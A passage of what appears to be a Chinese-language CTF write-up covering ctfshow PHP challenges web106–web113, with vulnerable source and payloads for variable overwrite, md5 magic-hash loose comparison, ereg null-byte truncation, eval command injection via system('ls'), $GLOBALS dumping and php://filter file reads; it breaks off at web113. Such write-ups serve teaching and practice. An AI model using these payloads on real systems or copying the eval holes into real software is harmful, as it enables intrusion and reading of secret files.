=&gt; <span class="variable">$value</span>)&#123;</span><br><span class="line">    <span class="keyword">if</span>(<span class="variable">$key</span>===<span class="string">&#x27;error&#x27;</span>)&#123;</span><br><span class="line">        <span 
class="keyword">die</span>(<span class="string">&quot;what are you doing?!&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="variable">$$key</span>=<span class="variable">$$value</span>;</span><br><span class="line">&#125;<span class="keyword">foreach</span>(<span class="variable">$_POST</span> <span class="keyword">as</span> <span class="variable">$key</span> =&gt; <span class="variable">$value</span>)&#123;</span><br><span class="line">    <span class="keyword">if</span>(<span class="variable">$value</span>===<span class="string">&#x27;flag&#x27;</span>)&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;what are you doing?!&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="variable">$$key</span>=<span class="variable">$$value</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span>(!(<span class="variable">$_POST</span>[<span class="string">&#x27;flag&#x27;</span>]==<span class="variable">$flag</span>))&#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="variable">$error</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;your are good&quot;</span>.<span class="variable">$flag</span>.<span class="string">&quot;\n&quot;</span>;</span><br><span class="line"><span class="keyword">die</span>(<span class="variable">$suces</span>);</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span> </span><br></pre></td></tr></table></figure>

<p>知识点：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">$$的变量覆盖</span><br><span class="line"></span><br><span class="line">GET和POST获得的参数是以键值对的形式存储的</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>分析：</p>
<p>第一个foreach是GET的键不能是error，第二个是POST的值不能是flag</p>
<p>题目一共有三个变量：$error、$suces、$flag。我们只要令其中任意一个变量的值等于$flag的值，都可以通过die或者直接echo把它输出。</p>
<p>通过die($error)输出：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">payload：</span><br><span class="line">GET:?suces=flag</span><br><span class="line">POST:error=suces</span><br></pre></td></tr></table></figure>

<p>分析GET请求</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">foreach($_GET as $key =&gt; $value)&#123;</span><br><span class="line">    if($key===&#x27;error&#x27;)&#123;</span><br><span class="line">        die(&quot;what are you doing?!&quot;);</span><br><span class="line">    &#125;</span><br><span class="line">    $$key=$$value;</span><br><span class="line">&#125;</span><br><span class="line">//当传入suces=flag时，实际上执行的是$suces=$flag</span><br><span class="line">//即把flag赋值给了suces变量</span><br></pre></td></tr></table></figure>

<p>分析：POST请求</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">foreach($_POST as $key =&gt; $value)&#123;</span><br><span class="line">    if($value===&#x27;flag&#x27;)&#123;</span><br><span class="line">        die(&quot;what are you doing?!&quot;);</span><br><span class="line">    &#125;</span><br><span class="line">    $$key=$$value;</span><br><span class="line">&#125;</span><br><span class="line"> </span><br><span class="line">//传入error=suces,得到$error=$suces=$flag</span><br><span class="line">//即成功把flag的值赋给了error变量</span><br></pre></td></tr></table></figure>



<h1 id="web107"><a href="#web107" class="headerlink" title="web107"></a>web107</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">include</span>(<span class="string">&quot;flag.php&quot;</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;v1&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$v1</span> = <span class="variable">$_POST</span>[<span class="string">&#x27;v1&#x27;</span>];</span><br><span class="line">    <span class="variable">$v3</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;v3&#x27;</span>];</span><br><span class="line">       parse_str(<span class="variable">$v1</span>,<span class="variable">$v2</span>);</span><br><span class="line">       <span class="keyword">if</span>(<span class="variable">$v2</span>[<span class="string">&#x27;flag&#x27;</span>]==md5(<span class="variable">$v3</span>))&#123;</span><br><span class="line">           <span class="keyword">echo</span> <span 
class="variable">$flag</span>;</span><br><span class="line">       &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://php.p2hp.com/manual/zh/function.parse-str.php">parse_str函数</a></p>
<p>第二个参数：可选。规定用于存储变量的数组名称；指定该参数后，解析出的变量会被存入这个数组中。</p>
<p>利用md5碰撞：使得v1中的flag=0，然后令v3=QNKCDZO（md5(QNKCDZO)=0e…，以0e开头的字符串在==弱比较中会被按科学计数法解析为0，从而与0相等）</p>
<p>payload：<code>v1=flag=0</code>，<code>v3=QNKCDZO</code></p>
<p>md5弱碰撞：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span 
class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br></pre></td><td class="code"><pre><span class="line">0e开头的md5和原值：</span><br><span class="line">QNKCDZO</span><br><span class="line">0e830400451993494058024219903391</span><br><span class="line">240610708</span><br><span class="line">0e462097431906509019562988736854</span><br><span class="line">s878926199a</span><br><span class="line">0e545993274517709034328855841020</span><br><span class="line">s155964671a</span><br><span class="line">0e342768416822451524974117254469</span><br><span class="line">s214587387a</span><br><span class="line">0e848240448830537924465865611904</span><br><span class="line">s214587387a</span><br><span class="line">0e848240448830537924465865611904</span><br><span class="line">s878926199a</span><br><span class="line">0e545993274517709034328855841020</span><br><span class="line">s1091221200a</span><br><span class="line">0e940624217856561557816327384675</span><br><span class="line">s1885207154a</span><br><span class="line">0e509367213418206700842008763514</span><br><span class="line">s1502113478a</span><br><span class="line">0e861580163291561247404381396064</span><br><span class="line">s1885207154a</span><br><span class="line">0e509367213418206700842008763514</span><br><span class="line">s1836677006a</span><br><span class="line">0e481036490867661113260034900752</span><br><span class="line">s155964671a</span><br><span class="line">0e342768416822451524974117254469</span><br><span class="line">s1184209335a</span><br><span 
class="line">0e072485820392773389523109082030</span><br><span class="line">s1665632922a</span><br><span class="line">0e731198061491163073197128363787</span><br><span class="line">s1502113478a</span><br><span class="line">0e861580163291561247404381396064</span><br><span class="line">s1836677006a</span><br><span class="line">0e481036490867661113260034900752</span><br><span class="line">s1091221200a</span><br><span class="line">0e940624217856561557816327384675</span><br><span class="line">s155964671a</span><br><span class="line">0e342768416822451524974117254469</span><br><span class="line">s1502113478a</span><br><span class="line">0e861580163291561247404381396064</span><br><span class="line">s155964671a</span><br><span class="line">0e342768416822451524974117254469</span><br><span class="line">s1665632922a</span><br><span class="line">0e731198061491163073197128363787</span><br><span class="line">s155964671a</span><br><span class="line">0e342768416822451524974117254469</span><br><span class="line">s1091221200a</span><br><span class="line">0e940624217856561557816327384675</span><br><span class="line">s1836677006a</span><br><span class="line">0e481036490867661113260034900752</span><br><span class="line">s1885207154a</span><br><span class="line">0e509367213418206700842008763514</span><br><span class="line">s532378020a</span><br><span class="line">0e220463095855511507588041205815</span><br><span class="line">s878926199a</span><br><span class="line">0e545993274517709034328855841020</span><br><span class="line">s1091221200a</span><br><span class="line">0e940624217856561557816327384675</span><br><span class="line">s214587387a</span><br><span class="line">0e848240448830537924465865611904</span><br><span class="line">s1502113478a</span><br><span class="line">0e861580163291561247404381396064</span><br><span class="line">s1091221200a</span><br><span class="line">0e940624217856561557816327384675</span><br><span class="line">s1665632922a</span><br><span 
class="line">0e731198061491163073197128363787</span><br><span class="line">s1885207154a</span><br><span class="line">0e509367213418206700842008763514</span><br><span class="line">s1836677006a</span><br><span class="line">0e481036490867661113260034900752</span><br><span class="line">s1665632922a</span><br><span class="line">0e731198061491163073197128363787</span><br><span class="line">s878926199a</span><br><span class="line">0e545993274517709034328855841020</span><br><span class="line"></span><br></pre></td></tr></table></figure>



<h1 id="web108"><a href="#web108" class="headerlink" title="web108"></a>web108</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">include</span>(<span class="string">&quot;flag.php&quot;</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (ereg (<span class="string">&quot;^[a-zA-Z]+$&quot;</span>, <span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>])===<span class="literal">FALSE</span>)  &#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">&#x27;error&#x27;</span>);</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">//只有36d的人才能看到flag</span></span><br><span class="line"><span class="keyword">if</span>(intval(strrev(<span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>]))==<span class="number">0x36d</span>)&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="variable">$flag</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span 
class="line"><span class="meta">?&gt;</span></span><br><span class="line"><span class="built_in">error</span></span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://php.p2hp.com/manual/zh/function.strrev.php">strrev函数</a></p>
<p><a target="_blank" rel="noopener" href="https://php.p2hp.com/manual/zh/function.intval.php">intval函数</a></p>
<p>ereg函数存在NULL截断漏洞，导致正则过滤被绕过，所以可以使用%00截断正则匹配</p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_25987491/article/details/79952393">php中ereg函数的截断漏洞</a></p>
<p>0x36d=877，因为输入会被strrev反转，所以需要预先写成反转后的778；同时需要用%00截断绕过ereg的字母检查，所以<code>c=d%00778</code>经过反转后再取整就是877</p>
<h1 id="web109"><a href="#web109" class="headerlink" title="web109"></a>web109</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;v1&#x27;</span>]) &amp;&amp; <span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;v2&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$v1</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;v1&#x27;</span>];</span><br><span class="line">    <span class="variable">$v2</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;v2&#x27;</span>];</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">&#x27;/[a-zA-Z]+/&#x27;</span>, <span class="variable">$v1</span>) &amp;&amp; preg_match(<span class="string">&#x27;/[a-zA-Z]+/&#x27;</span>, <span class="variable">$v2</span>))&#123;</span><br><span class="line">            <span class="keyword">eval</span>(<span class="string">&quot;echo new <span class="subst">$v1</span>(<span 
class="subst">$v2</span>());&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">PHP异常处理 、嵌套执行</span><br><span class="line">通过异常处理类Exception(system(‘cmd’))可以运行指定代码，并且能返回运行的结果（如果存在返回）</span><br><span class="line">只要是变量后面紧跟着（），那么对这个变量进行函数调用。例如$a = &#x27;phpinfo&#x27;; $a(）即调用phpinfo（）</span><br></pre></td></tr></table></figure>

<p>因为只要有字母就行，所以利用PHP已有的类闭合一下(预防意外的报错导致程序无法正常执行)，然后构造命令执行即可。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">?v1=Exception();system(&quot;ls&quot;);//&amp;v2=a</span><br><span class="line">?v1=ReflectionClass&amp;v2=system(&quot;ls&quot;)</span><br><span class="line">?v1=ReflectionClass(&quot;PDO&quot;);system(&quot;ls&quot;);//&amp;v2=a</span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="http://blog.uiste.com/2015/20151018-1.html">反射 | PDO</a></p>
<h1 id="web110"><a href="#web110" class="headerlink" title="web110"></a>web110</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;v1&#x27;</span>]) &amp;&amp; <span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;v2&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$v1</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;v1&#x27;</span>];</span><br><span class="line">    <span class="variable">$v2</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;v2&#x27;</span>];</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">&#x27;/\~|\`|\!|\@|\#|\\$|\%|\^|\&amp;|\*|\(|\)|\_|\-|\+|\=|\&#123;|\[|\;|\:|\&quot;|\&#x27;|\,|\.|\?|\\\\|\/|[0-9]/&#x27;</span>, <span class="variable">$v1</span>))&#123;</span><br><span class="line">  
          <span class="keyword">die</span>(<span class="string">&quot;error v1&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">&#x27;/\~|\`|\!|\@|\#|\\$|\%|\^|\&amp;|\*|\(|\)|\_|\-|\+|\=|\&#123;|\[|\;|\:|\&quot;|\&#x27;|\,|\.|\?|\\\\|\/|[0-9]/&#x27;</span>, <span class="variable">$v2</span>))&#123;</span><br><span class="line">            <span class="keyword">die</span>(<span class="string">&quot;error v2&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">eval</span>(<span class="string">&quot;echo new <span class="subst">$v1</span>(<span class="subst">$v2</span>());&quot;</span>);</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>FilesystemIterator用于获取目录中的文件：<a target="_blank" rel="noopener" href="http://phpff.com/filesystemiterator">FilesystemIterator</a></p>
<p>getcwd()函数用于取得当前工作目录：<a target="_blank" rel="noopener" href="https://www.runoob.com/php/func-directory-getcwd.html">getcwd()函数</a></p>
<p>构造payload：</p>
<p><code>v1=FilesystemIterator&amp;v2=getcwd</code></p>
<p>得到当前目录的第一个文件名：fl36dga.txt，然后访问即可。缺陷是如果flag文件不在第一位，就得不到这个文件名，因为直接echo一个FilesystemIterator对象只会输出它当前指向的那一个文件名。</p>
<h1 id="web111"><a href="#web111" class="headerlink" title="web111"></a>web111</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line">     </span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">include</span>(<span class="string">&quot;flag.php&quot;</span>);</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">getFlag</span>(<span class="params">&amp;<span class="variable">$v1</span>,&amp;<span class="variable">$v2</span></span>)</span>&#123;</span><br><span class="line">    <span class="keyword">eval</span>(<span class="string">&quot;$<span class="subst">$v1</span> = &amp;$<span class="subst">$v2</span>;&quot;</span>);</span><br><span class="line">    var_dump(<span 
class="variable">$$v1</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;v1&#x27;</span>]) &amp;&amp; <span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;v2&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$v1</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;v1&#x27;</span>];</span><br><span class="line">    <span class="variable">$v2</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;v2&#x27;</span>];</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">&#x27;/\~| |\`|\!|\@|\#|\\$|\%|\^|\&amp;|\*|\(|\)|\_|\-|\+|\=|\&#123;|\[|\;|\:|\&quot;|\&#x27;|\,|\.|\?|\\\\|\/|[0-9]|\&lt;|\&gt;/&#x27;</span>, <span class="variable">$v1</span>))&#123;</span><br><span class="line">            <span class="keyword">die</span>(<span class="string">&quot;error v1&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">&#x27;/\~| |\`|\!|\@|\#|\\$|\%|\^|\&amp;|\*|\(|\)|\_|\-|\+|\=|\&#123;|\[|\;|\:|\&quot;|\&#x27;|\,|\.|\?|\\\\|\/|[0-9]|\&lt;|\&gt;/&#x27;</span>, <span class="variable">$v2</span>))&#123;</span><br><span class="line">            <span class="keyword">die</span>(<span class="string">&quot;error v2&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">&#x27;/ctfshow/&#x27;</span>, <span class="variable">$v1</span>))&#123;</span><br><span class="line">            getFlag(<span class="variable">$v1</span>,<span 
class="variable">$v2</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">php超全局变量$GLOBALS的使用</span><br><span class="line"></span><br><span class="line">GLOBALS 引用全局作用域中可用的全部变量，是一个包含了全部变量的全局组合数组。变量的名字就是数组的键。</span><br><span class="line"></span><br><span class="line">PHP生命周期中，定义在函数体外部的所谓全局变量，函数内部是不能直接获得的。即外部变量，函数内部是无法访问的，除非给函数传参数</span><br><span class="line"></span><br><span class="line">例如：</span><br><span class="line"></span><br><span class="line">    $a=123;</span><br><span class="line">    $b=456;</span><br><span class="line">    var_dump($GLOBALS);</span><br><span class="line"></span><br><span class="line">返回内容较多就不一一列出了。我们只看最后两条，发现我们自行定义的变量会被输出</span><br><span class="line"></span><br><span class="line">  [&quot;a&quot;]=&gt;</span><br><span class="line"></span><br><span class="line">  int(123)</span><br><span class="line"></span><br><span class="line">  [&quot;b&quot;]=&gt;</span><br><span class="line"></span><br><span class="line">  int(456)</span><br></pre></td></tr></table></figure>

<p>分析：</p>
<p>所以对于该题，只要令v1=ctfshow、v2=GLOBALS，经过getFlag之后执行的是eval($ctfshow=&amp;$GLOBALS;)，即让变量$ctfshow引用变量$GLOBALS的地址（两者等价），于是var_dump($ctfshow)就等同于var_dump($GLOBALS)，即可将全部全局变量输出</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload:?v1=ctfshow&amp;v2=GLOBALS</span><br></pre></td></tr></table></figure>



<h1 id="web112"><a href="#web112" class="headerlink" title="web112"></a>web112</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">filter</span>(<span class="params"><span class="variable">$file</span></span>)</span>&#123;</span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">&#x27;/\.\.\/|http|https|data|input|rot13|base64|string/i&#x27;</span>,<span class="variable">$file</span>))&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;hacker!&quot;</span>);</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="variable">$file</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="variable">$file</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;file&#x27;</span>];</span><br><span class="line"><span 
class="keyword">if</span>(! is_file(<span class="variable">$file</span>))&#123;</span><br><span class="line">    highlight_file(filter(<span class="variable">$file</span>));</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;hacker!&quot;</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>知识点：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">is_file  判断给定文件名是否为一个正常的文件，filename为文件的路径。</span><br><span class="line">//is_file函数可以使用包装器伪协议来绕过，当is_file的参数为伪协议时，返回值为false</span><br><span class="line">//不影响file_get_contents highlight_file</span><br></pre></td></tr></table></figure>

<p>分析：</p>
<p>我们的目的是让is_file判断它不是文件，同时highlight_file仍能把它当作文件读取。这时可以利用php伪协议</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">payload:</span><br><span class="line">可以直接用不带任何过滤器的filter伪协议</span><br><span class="line">?file=php://filter/resource=flag.php</span><br><span class="line"> </span><br><span class="line">也可以用一些没有过滤掉的编码方式和转换方式</span><br><span class="line">?file=php://filter/read=convert.quoted-printable-encode/resource=flag.php</span><br><span class="line">?file=compress.zlib://flag.php</span><br><span class="line">?file=php://filter/convert.iconv.UCS-2LE.UCS-2BE/resource=flag.php</span><br><span class="line">?file=php://filter/read=convert.iconv.utf-8.utf-16le/resource=flag.php</span><br></pre></td></tr></table></figure>



<h1 id="web113"><a href="#web113" class="headerlink" title="web113"></a>web113</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">filter</span>(<span class="params"><span class="variable">$file</span></span>)</span>&#123;</span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">&#x27;/filter|\.\.\/|http|https|data|data|rot13|base64|string/i&#x27;</span>,<span class="variable">$file</span>))&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&#x27;hacker!&#x27;</span>);</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="variable">$file</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="variable">$file</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;file&#x27;</span>];</span><br><span class="line"><span class="keyword">if</span>(! 
is_file(<span class="variable">$file</span>))&#123;</span><br><span class="line">    highlight_file(filter(<span class="variable">$file</span>));</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;hacker!&quot;</span>;</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>

